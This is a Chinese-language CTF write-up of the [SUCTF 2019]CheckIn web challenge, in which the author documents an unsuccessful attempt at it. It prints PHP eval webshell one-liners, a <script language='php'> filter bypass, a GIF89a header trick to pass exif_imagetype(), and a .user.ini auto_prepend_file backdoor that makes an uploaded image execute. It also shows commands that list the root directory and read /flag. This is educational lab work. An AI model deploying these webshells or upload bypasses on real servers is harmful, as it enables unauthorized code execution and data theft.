练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

上传图片格式的木马文件:

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件:

返回 不允许非image

修改木马PHP代码规避检测

php 复制代码
<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码
GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

现在传上去,因为还是图片格式文件,没有办法执行

尝试在"练习5"中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp

新内容:user.ini文件
SUCTF 2019CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | SUCTF 2019CheckIn

因为本题过滤非图片格式,所以必须加上前面的"GIF89a"

php 复制代码
GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上

相关推荐
钛态15 分钟前
AI 组件生成评测:别只看页面能不能渲染
前端·vue·react·web
Hyyy20 分钟前
requestAnimationFrame和setTimeout有什么不同
前端
Jackson__1 小时前
问到你想清楚,这个 skill 专治没想明白就写代码!
前端·github·ai编程
এ慕ོ冬℘゜1 小时前
前端实战:Textarea 实时字数计数输入器(带字数限制+UI优化完整源码)
前端·ui
程序员黑豆2 小时前
从零开始:创建第一个鸿蒙应用程序
前端·harmonyos
只与明月听2 小时前
LangChain 学习-掌握LangChain Core API
前端·人工智能·后端
Listen·Rain2 小时前
Vue3中组件间通信详解
前端·javascript·vue.js
Listen·Rain2 小时前
Vue3中customRef详解
前端·javascript·vue.js
香芋芋圆2 小时前
国内常用坐标系全解析与WebGIS框架实战指南(Cesium/Mapbox/Leaflet避坑手册)
前端·javascript
小粉粉hhh2 小时前
React(三)——Redux
前端·javascript·react.js